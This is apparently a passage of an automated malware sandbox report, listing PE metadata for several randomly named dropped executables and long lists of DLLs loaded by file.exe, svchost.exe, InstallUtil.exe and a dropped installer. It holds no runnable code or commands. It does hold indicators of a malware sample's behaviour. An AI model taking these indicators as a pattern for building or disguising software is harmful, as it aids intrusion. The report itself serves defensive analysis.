                    Source: dxR7p0Pw8zQ312jALneLeimr.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Q54LGmnZmhktpXP3y7EOrtRY.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: h9Cux8w1auuBknjQZWKFquuD.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: r8s8W6BwO9zs4dtTCMpyOk6D.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: HVNYeIaPfKI1PhwDbNEQTtKf.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: J8LomUCEiQeMvIGqlnqM0LZ5.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: BQEn0lhfn4Y5OIYegdFv1wu3.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: aY7RTHx8jQe0LE98Ey8c4ndl.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: arAAytPAHIBxEUE8lqY8jFUv.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: Ca4kQMpVXP8DY5HQ8cbuvFmH.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: file.exeStatic PE information: No import functions for PE file found
                    Source: file.exe, 00000000.00000000.2017927246.000002C8B7E02000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs file.exe
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptnet.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
                    Source: C:\Users\user\Desktop\file.exe | Section loaded: cabinet.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: propsys.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: edputil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: slc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sppc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpSection loaded: riched20.dll
